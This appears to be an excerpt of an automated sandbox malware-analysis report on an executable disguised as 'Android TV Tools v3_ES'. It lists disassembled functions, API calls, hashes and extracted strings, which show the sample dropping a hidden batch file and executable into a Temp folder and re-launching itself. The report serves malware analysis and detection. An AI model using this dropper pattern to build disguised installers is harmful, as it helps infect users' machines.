                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: FileHandleModuleNamePathTemp
                        • String ID: $ 389816$ 389816$ mkdir $ mkdir $%s%s$%s%s$%s%s$%s%s$%s%s%s$%s%s%s%s$%s%s%s%s%s$%s%s%s%s%s$%s%s%s%s%s$%s%s%s%s%s%s%s%s$%s%s%s%s%s%s%s%s$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$.bat$.exe$@echo off$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\afolder$C:\Users\user\AppData\Local\Temp\ytmp$C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe$C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat$C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe"$SativaSmok$attrib +h $if not exist $if not exist $set cmdline=
                        • API String ID: 582120069-4044924319
                        • Opcode ID: 463d37616fd5927b5e3275e9d21ef53b86b473988ab558a244dd7b08ceaf7d10
                        • Instruction ID: 1f264d1c5fa84f41fc915c775896d5a35dae581fe8400ea8a73f093551c495cf
                        • Opcode Fuzzy Hash: 463d37616fd5927b5e3275e9d21ef53b86b473988ab558a244dd7b08ceaf7d10
                        • Instruction Fuzzy Hash: FB72C7F2D4061476E7106BA1AC07F9B362D9B2131DF4404BAF90D712C2F9BB57684EAB
                        Function 0040B7EC Relevance: 13.7, APIs: 9, Instructions: 221COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 736 40b7ec-40b81d 737 40b85f-40b864 736->737 738 40b81f-40b832 CompareStringW 736->738 741 40b876-40b879 737->741 742 40b866-40b873 call 40ba69 737->742 739 40b834-40b83a 738->739 740 40b83c-40b84f CompareStringA 738->740 739->737 745 40ba55 740->745 746 40b855 740->746 743 40b88b-40b893 741->743 744 40b87b-40b888 call 40ba69 741->744 742->741 749 40b8b0-40b8b2 743->749 750 40b895-40b8ab CompareStringA 743->750 744->743 752 40ba57-40ba68 745->752 746->737 749->745 754 40b8b8-40b8bb 749->754 750->752 755 40b8c5-40b8c7 754->755 756 40b8bd-40b8c2 754->756 757 40b8d2-40b8d5 755->757 758 40b8c9-40b8cc 755->758 756->755 760 40b8d7 757->760 761 40b8df-40b8e2 757->761 758->757 759 40b96a-40b980 MultiByteToWideChar 758->759 759->745 762 40b986-40b9bc call 405810 759->762 763 40b8d9-40b8da 760->763 764 40b8e4-40b8e6 761->764 765 40b8eb-40b8ed 761->765 762->745 775 40b9c2-40b9da MultiByteToWideChar 762->775 763->752 764->752 766 40b930-40b932 765->766 767 40b8ef-40b8fe GetCPInfo 765->767 766->763 767->745 769 40b904-40b906 767->769 771 40b934-40b937 769->771 772 40b908-40b90c 769->772 771->759 776 40b939-40b93d 771->776 772->766 774 40b90e-40b914 772->774 774->766 777 40b916-40b91b 774->777 775->745 778 40b9dc-40b9f2 MultiByteToWideChar 775->778 776->764 779 40b93f-40b945 776->779 777->766 780 40b91d-40b924 777->780 778->745 781 40b9f4-40ba26 call 405810 778->781 779->764 782 40b947-40b94c 779->782 783 40b926-40b928 780->783 784 40b92a-40b92e 780->784 781->745 792 40ba28-40ba3d MultiByteToWideChar 781->792 782->764 786 40b94e-40b955 782->786 783->760 783->784 784->766 784->777 788 40b957-40b959 786->788 789 40b95f-40b963 786->789 788->760 788->789 789->782 790 40b965 789->790 790->764 792->745 793 40ba3f-40ba53 CompareStringW 792->793 793->752
                        APIs
                        • CompareStringW.KERNEL32(00000000,00000000,0040D514,00000001,0040D514,00000001,00000000,01490DEC,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B82A
                        • CompareStringA.KERNEL32(00000000,00000000,0040D510,00000001,0040D510,00000001,?,00406910,00000000,?,00000000,?), ref: 0040B847
                        • CompareStringA.KERNEL32(?,004055BA,00000000,?,?,00000000,00000000,01490DEC,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B8A5
                        • GetCPInfo.KERNEL32(?,00000000,00000000,01490DEC,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B8F6
                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B975
                        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000000,00000000,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B9D6
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,?,00406910,00000000,?,00000000,?), ref: 0040B9E9
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040BA35
                        • CompareStringW.KERNEL32(?,004055BA,00000000,00000000,?,00000000,?,00000000,?,00406910,00000000,?,00000000,?), ref: 0040BA4D
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: ByteCharCompareMultiStringWide$Info
                        • String ID:
                        • API String ID: 1651298574-0
                        • Opcode ID: 1febd849295bec1ab59561060e3b41c03fe70713722d6c16647b5fdedf78774c
                        • Instruction ID: 8202621e738749456c253d6a474982a5d9dbd0abdc63befaa9d84c019e8fc6d1
                        • Opcode Fuzzy Hash: 1febd849295bec1ab59561060e3b41c03fe70713722d6c16647b5fdedf78774c
                        • Instruction Fuzzy Hash: CB71AD72A00249AFCF21AF948C45AEF7BB9EB05314F14803BF955B22A0D3398D55DB9D
                        Function 0040A78C Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 230fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 794 40a78c-40a7a7 795 40a7b2-40a7b6 794->795 796 40a7a9-40a7b0 794->796 797 40a7bd-40a7c4 795->797 796->797 798 40a7c6-40a7c9 797->798 799 40a7d7-40a7e0 797->799 800 40a7d3 798->800 801 40a7cb-40a7d1 798->801 802 40a7e2-40a7e3 799->802 803 40a80f 799->803 800->799 801->799 801->800 804 40a7e5-40a7e6 802->804 805 40a806-40a80d 802->805 806 40a816-40a81c 803->806 807 40a7e8-40a7f8 804->807 808 40a7fd-40a804 804->808 805->806 809 40a844 806->809 810 40a81e-40a821 806->810 812 40aa22-40aa25 807->812 808->806 811 40a847-40a85a 809->811 813 40a823-40a826 810->813 814 40a83b-40a842 810->814 815 40a891-40a897 811->815 816 40a85c 811->816 817 40aa40-40aa44 812->817 818 40a832-40a839 813->818 819 40a828-40a82b 813->819 814->811 822 40a8b3 815->822 823 40a899-40a89f 815->823 820 40a88c-40a88f 816->820 821 40a85e-40a860 816->821 818->811 819->807 824 40a82d-40a830 819->824 825 40a8ba-40a8c4 820->825 821->820 826 40a862-40a864 821->826 822->825 827 40a8a1-40a8a3 823->827 828 40a8aa-40a8b1 823->828 824->811 829 40a8c6-40a8d4 825->829 830 40a8d9-40a8db 825->830 831 40a883-40a88a 826->831 832 40a866-40a86c 826->832 827->822 833 40a8a5 827->833 828->825 829->830 834 40a8d6-40a8d8 829->834 835 40a8e7-40a8ea 830->835 836 40a8dd-40a8e3 830->836 831->825 832->828 837 40a86e-40a874 832->837 833->807 834->830 838 40a8ec 835->838 839 40a8ee-40a8f0 835->839 836->835 837->807 840 40a87a-40a881 837->840 838->839 841 40a8f2-40a8f8 839->841 842 40a8fa-40a8fc 839->842 840->825 843 40a904-40a910 call 40a354 841->843 842->843 844 40a8fe 842->844 847 40a912-40a923 843->847 848 40a925-40a942 CreateFileA 843->848 844->843 849 40a963-40a965 847->849 850 40a944-40a94d GetFileType 848->850 851 40a956-40a962 GetLastError call 409272 848->851 849->817 852 40a96a-40a96d 850->852 853 40a94f-40a950 CloseHandle 850->853 851->849 856 40a975-40a978 852->856 857 40a96f-40a973 852->857 853->851 858 40a97e-40a9ad call 40a3e9 856->858 859 40a97a 856->859 857->858 862 40aa27-40aa2b 858->862 863 40a9af-40a9b1 858->863 859->858 865 40aa2d-40aa31 862->865 866 40aa3e 862->866 863->862 864 40a9b3-40a9b7 863->864 864->862 867 40a9b9-40a9cc call 407522 864->867 865->866 868 40aa33-40aa3a 865->868 866->817 871 40a9dc-40a9f1 call 407a37 867->871 872 40a9ce-40a9d8 867->872 868->866 878 40a9f3-40a9f7 871->878 879 40aa09-40aa19 call 407522 871->879 872->862 873 40a9da 872->873 875 40aa1b-40aa1c call 407337 873->875 880 40aa21 875->880 878->879 881 40a9f9-40aa07 call 40bcda 878->881 879->862 879->875 880->812 881->875 881->879
                        APIs
                        • CreateFileA.KERNELBASE(00000001,80000000,00000040,0000000C,00000001,00000080,00000000,00000041,?,00000000), ref: 0040A938
                        • GetFileType.KERNELBASE(00000000), ref: 0040A945
                        • CloseHandle.KERNEL32(00000000), ref: 0040A950
                        • GetLastError.KERNEL32 ref: 0040A956
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: File$CloseCreateErrorHandleLastType
                        • String ID: @$H
                        • API String ID: 1809617866-104103126
                        • Opcode ID: b2e6a79cf8b840c5e042042894f39d002ec681136d129e220ea756b77ed9d5fc
                        • Instruction ID: adf26b6370af484567565b22fdbdb287164912d56f4e7350506426c4a6c7ea82
                        • Opcode Fuzzy Hash: b2e6a79cf8b840c5e042042894f39d002ec681136d129e220ea756b77ed9d5fc
                        • Instruction Fuzzy Hash: 73811672E043459AEF249B6889447EE7B60AB01368F14C13BE9517B3C1D3BC8966DB4B
                        Function 00408E8F Relevance: 10.7, APIs: 7, Instructions: 180processsynchronizationCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 886 408e8f-408ea6 887 408ea8-408eab 886->887 888 408ebd-408ec0 886->888 887->888 889 408ead 887->889 890 408ec3-408ec7 888->890 891 408edf-408eef 889->891 892 408eaf-408eb2 889->892 893 408ef4-408f10 call 40b200 890->893 894 408ec9-408ecd 890->894 897 409010-409013 891->897 892->888 895 408eb4-408eb7 892->895 903 408f12 893->903 904 408f33-408f5b call 40a56e 893->904 894->894 896 408ecf-408ed6 894->896 895->891 899 408eb9 895->899 896->890 901 408ed8-408edd 896->901 900 409069-40906d 897->900 899->888 901->890 905 408f15-408f2b 903->905 909 408f94-408f98 904->909 910 408f5d-408f76 904->910 905->904 907 408f2d-408f31 905->907 907->904 907->905 913 408fc7-409007 CreateProcessA GetLastError call 407308 909->913 914 408f9a-408f9f 909->914 911 408f80-408f83 910->911 912 408f78-408f7e 910->912 916 408f86-408f8d 911->916 912->916 923 409015-409019 913->923 924 409009-40900f call 409272 913->924 917 408fa3-408fa6 914->917 916->910 919 408f8f-408f92 916->919 920 408fa8-408faa 917->920 921 408fac-408fae 917->921 919->909 922 408faf-408fb1 920->922 921->922 925 408fc0 922->925 926 408fb3-408fbe 922->926 928 409021-40902a 923->928 929 40901b-40901c call 405dca 923->929 924->897 925->913 926->917 932 40904b-40904f 928->932 933 40902c-409049 WaitForSingleObject GetExitCodeProcess CloseHandle 928->933 929->928 934 409051-409059 CloseHandle 932->934 935 40905b-40905e 932->935 936 409061-409066 CloseHandle 933->936 934->936 935->936 936->900
                        APIs
                        • CreateProcessA.KERNELBASE(004067F3,004067F3,00000000,00000000,00000001,000000FF,0040D108,00000000,?,?,0040D108,00000000,0040E414), ref: 00408FEC
                        • GetLastError.KERNEL32 ref: 00408FF4
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00409031
                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 0040903E
                        • CloseHandle.KERNEL32(?), ref: 00409047
                        • CloseHandle.KERNEL32(?), ref: 00409054
                        • CloseHandle.KERNEL32(0040684F), ref: 00409064
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: CloseHandle$Process$CodeCreateErrorExitLastObjectSingleWait
                        • String ID:
                        • API String ID: 966596688-0
                        • Opcode ID: c5a49d4fad8cc15bb5dc8a8dd04d4969f40e02af60581ae3535133ee7cc71e77
                        • Instruction ID: f038399a60921c0561f0a6f99f2b11a9d98f7d6fd060fb6637cb1a89438f4955
                        • Opcode Fuzzy Hash: c5a49d4fad8cc15bb5dc8a8dd04d4969f40e02af60581ae3535133ee7cc71e77
                        • Instruction Fuzzy Hash: 63511030D042099FDB218F64CD44AEEBBB5EB85314F10847FE4A5BB2D2CB799806CB58
                        Function 004075BC Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 937 4075bc-4075d2 call 408da8 940 4075d4-4075db call 406523 937->940 941 4075dc-4075ec 937->941 940->941 943 4075f2-4075f4 941->943 944 407610-407621 GetStartupInfoA 943->944 945 4075f6-40760e 943->945 947 407627-40762d 944->947 948 4076ec 944->948 945->943 947->948 949 407633-407642 947->949 950 4076ee-4076fa 948->950 951 407644 949->951 952 407646-40764c 949->952 953 407749 950->953 954 4076fc-407702 950->954 951->952 956 4076a0-4076a4 952->956 957 40764e 952->957 955 40774d-407751 953->955 958 407704-407707 954->958 959 407709-407710 954->959 955->950 961 407753-407766 SetHandleCount 955->961 956->948 960 4076a6-4076ab 956->960 962 407653-407660 call 408da8 957->962 963 407713-40771f GetStdHandle 958->963 959->963 964 4076e3-4076ea 960->964 965 4076ad-4076b3 960->965 974 407662-40766b 962->974 975 40769a 962->975 967 407721-40772a GetFileType 963->967 968 407738-40773c 963->968 964->948 964->960 965->964 969 4076b5-4076b8 965->969 967->968 971 40772c-407736 967->971 968->955 972 4076c5-4076e0 969->972 973 4076ba-4076c3 GetFileType 969->973 971->968 976 40773e-407741 971->976 972->964 973->964 973->972 978 407671-407673 974->978 975->956 976->955 977 407743-407747 976->977 977->955 979 407675-40768b 978->979 980 40768d-407696 978->980 979->978 980->962 981 407698 980->981 981->956
                        APIs
                        • GetStartupInfoA.KERNEL32(?), ref: 00407615
                        • GetFileType.KERNEL32(00000800), ref: 004076BB
                        • GetStdHandle.KERNEL32(-000000F6), ref: 00407714
                        • GetFileType.KERNELBASE(00000000), ref: 00407722
                        • SetHandleCount.KERNEL32 ref: 00407759
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: FileHandleType$CountInfoStartup
                        • String ID:
                        • API String ID: 1710529072-0
                        • Opcode ID: 94766c67cce12e496a6129a5d9d2d5104d7cb2a8cdf1c8256d655f198b1c79a6
                        • Instruction ID: dd20ea5e2ad15785f978a9490fc45cc3bf13d48b7b8c0b4060476bf1d8323b67
                        • Opcode Fuzzy Hash: 94766c67cce12e496a6129a5d9d2d5104d7cb2a8cdf1c8256d655f198b1c79a6
                        • Instruction Fuzzy Hash: 50512331D086058BD7208B2CCD487663B90BB12374F194E3AE4A6AB3E1D779F849D75A
                        Function 00407A37 Relevance: 6.2, APIs: 4, Instructions: 174fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 982 407a37-407a49 983 407c14-407c1b 982->983 984 407a4f-407a70 982->984 985 407c25 983->985 984->983 986 407a76-407a83 984->986 987 407c28-407c2c 985->987 988 407a85-407a88 986->988 989 407aec-407aee 986->989 988->989 990 407a8a-407a8d 988->990 989->987 991 407aac-407ac3 ReadFile 990->991 992 407a8f-407a94 990->992 994 407ac5-407ad0 GetLastError 991->994 995 407aff-407b11 991->995 992->991 993 407a96-407aa7 992->993 993->991 996 407ad2-407ae2 994->996 997 407ae7-407aea 994->997 998 407b17-407b19 995->998 999 407c0f-407c12 995->999 996->985 997->989 1000 407af3-407afa call 409272 997->1000 1001 407b24 998->1001 1002 407b1b-407b1e 998->1002 999->987 1000->985 1005 407b26-407b38 1001->1005 1002->1001 1004 407b20-407b22 1002->1004 1004->1005 1007 407c09-407c0c 1005->1007 1008 407b3e-407b45 1005->1008 1007->999 1009 407bf9-407c03 1008->1009 1010 407b4b-407b4d 1008->1010 1009->1007 1011 407c05-407c07 1009->1011 1012 407b5a-407b5e 1010->1012 1013 407b4f-407b55 1010->1013 1011->1007 1014 407b60-407b67 1012->1014 1015 407b78-407b94 ReadFile 1012->1015 1016 407beb-407bf1 1013->1016 1017 407b69-407b6d 1014->1017 1018 407b6f-407b76 1014->1018 1020 407ba0-407ba4 1015->1020 1021 407b96-407b9e GetLastError 1015->1021 1016->1008 1019 407bf7 1016->1019 1022 407bcd-407bd0 1017->1022 1018->1016 1019->1007 1023 407be7 1020->1023 1024 407ba6-407bad 1020->1024 1021->1020 1021->1023 1025 407bea 1022->1025 1023->1025 1026 407bc2-407bc5 1024->1026 1027 407baf-407bb4 1024->1027 1025->1016 1029 407bd2-407be5 call 407522 1026->1029 1030 407bc7-407bcb 1026->1030 1027->1022 1028 407bb6-407bc0 1027->1028 1028->1016 1029->1016 1029->1023 1030->1022 1030->1029
                        APIs
                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000100,00000000), ref: 00407ABB
                        • GetLastError.KERNEL32 ref: 00407AC5
                        • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 00407B8C
                        • GetLastError.KERNEL32 ref: 00407B96
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: ErrorFileLastRead
                        • String ID:
                        • API String ID: 1948546556-0
                        • Opcode ID: 0d5067df5a756ab654c47183697cafa53bf190f3cee5e65e26fac1f14512f9f4
                        • Instruction ID: 3c71f4a4c914093daa4e111219e29098325ab7dc149a3d367288bca257ac33ee
                        • Opcode Fuzzy Hash: 0d5067df5a756ab654c47183697cafa53bf190f3cee5e65e26fac1f14512f9f4
                        • Instruction Fuzzy Hash: FD619F30E0C2899FDB118F58C844BAA7BB0BB12308F1444ABE451AB3D1D379B946CB5B
                        Function 00407767 Relevance: 6.1, APIs: 4, Instructions: 139fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 407767-40777c 1034 407782-40779e 1033->1034 1035 4078fb-407902 1033->1035 1034->1035 1037 4077a4-4077af 1034->1037 1036 40790c 1035->1036 1040 40790f-407913 1036->1040 1038 4077b1-4077b3 1037->1038 1039 4077b8-4077ba 1037->1039 1038->1040 1041 4077c8-4077d0 1039->1041 1042 4077bc-4077c5 call 407522 1039->1042 1044 4077d6-4077e2 1041->1044 1045 407897-4078ac WriteFile 1041->1045 1042->1041 1049 4077e8 1044->1049 1050 4078cf-4078d6 1044->1050 1047 4078b9-4078c2 GetLastError 1045->1047 1048 4078ae-4078b7 1045->1048 1051 407860-407865 1047->1051 1048->1051 1052 4077ee-4077f7 1049->1052 1053 4078e4-4078f4 1050->1053 1054 4078d8-4078de 1050->1054 1055 4078f6-4078f9 1051->1055 1056 40786b-40786e 1051->1056 1057 407822-407847 WriteFile 1052->1057 1058 4077f9-407804 1052->1058 1053->1036 1054->1038 1054->1053 1055->1040 1056->1050 1059 407870-407876 1056->1059 1062 407849-407851 1057->1062 1063 40788c-407895 GetLastError 1057->1063 1060 407806-40780c 1058->1060 1061 40780d-407820 1058->1061 1064 4078c4-4078cd call 409272 1059->1064 1065 407878-407887 1059->1065 1060->1061 1061->1052 1061->1057 1066 40785e 1062->1066 1067 407853-40785c 1062->1067 1063->1066 1064->1036 1065->1036 1066->1051 1067->1049 1067->1066
                        APIs
                        • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,?), ref: 0040783F
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: FileWrite
                        • String ID:
                        • API String ID: 3934441357-0
                        • Opcode ID: aff254ac8d8d06b1c375933265a01826a9e1b8ea15b91dc9473dc59729e29b07
                        • Instruction ID: c19b3d791ab711fa8c5ef569e7948fa19eb36375cf462a63fb87303f5cca5c05
                        • Opcode Fuzzy Hash: aff254ac8d8d06b1c375933265a01826a9e1b8ea15b91dc9473dc59729e29b07
                        • Instruction Fuzzy Hash: 9251E571D04208EFDB11DF68C888ADE7BB0FB41340F2085BAE815AB2D0D334EA44CB5A
                        Function 00409EB2 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1387 409eb2-409ec3 1388 409ef5-409f19 HeapAlloc 1387->1388 1389 409ec5-409ee2 HeapReAlloc 1387->1389 1391 409f45-409f47 1388->1391 1392 409f1b-409f33 VirtualAlloc 1388->1392 1390 409ee4-409ef0 1389->1390 1389->1391 1390->1388 1393 409f60-409f62 1391->1393 1394 409f35-409f3f HeapFree 1392->1394 1395 409f49-409f5e 1392->1395 1394->1391 1395->1393
                        APIs
                        • HeapReAlloc.KERNEL32(00000000,00000060,?,00000000,00409C7A,?,?,?,00000100), ref: 00409EDA
                        • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00409C7A,?,?,?,00000100), ref: 00409F0E
                        • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00000000,00409C7A,?,?,?,00000100), ref: 00409F28
                        • HeapFree.KERNEL32(00000000,?,?,00000000,00409C7A,?,?,?,00000100), ref: 00409F3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.3238834413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3238810644.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238871170.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3238896770.0000000000F0D000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3239314353.0000000000F0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_Android TV Tools v3_ES.jbxd
                        Similarity
                        • API ID: AllocHeap$FreeVirtual
                        • String ID:
                        • API String ID: 3499195154-0
                        • Opcode ID: 0d56ca5cad879738d64fea35e25317797a88da85582025049e091cafbee42b77
                        • Instruction ID: 16a10c85fc288a3fd0697e0b5d36225c66a208a9a462dcf54f8a75511906bb86
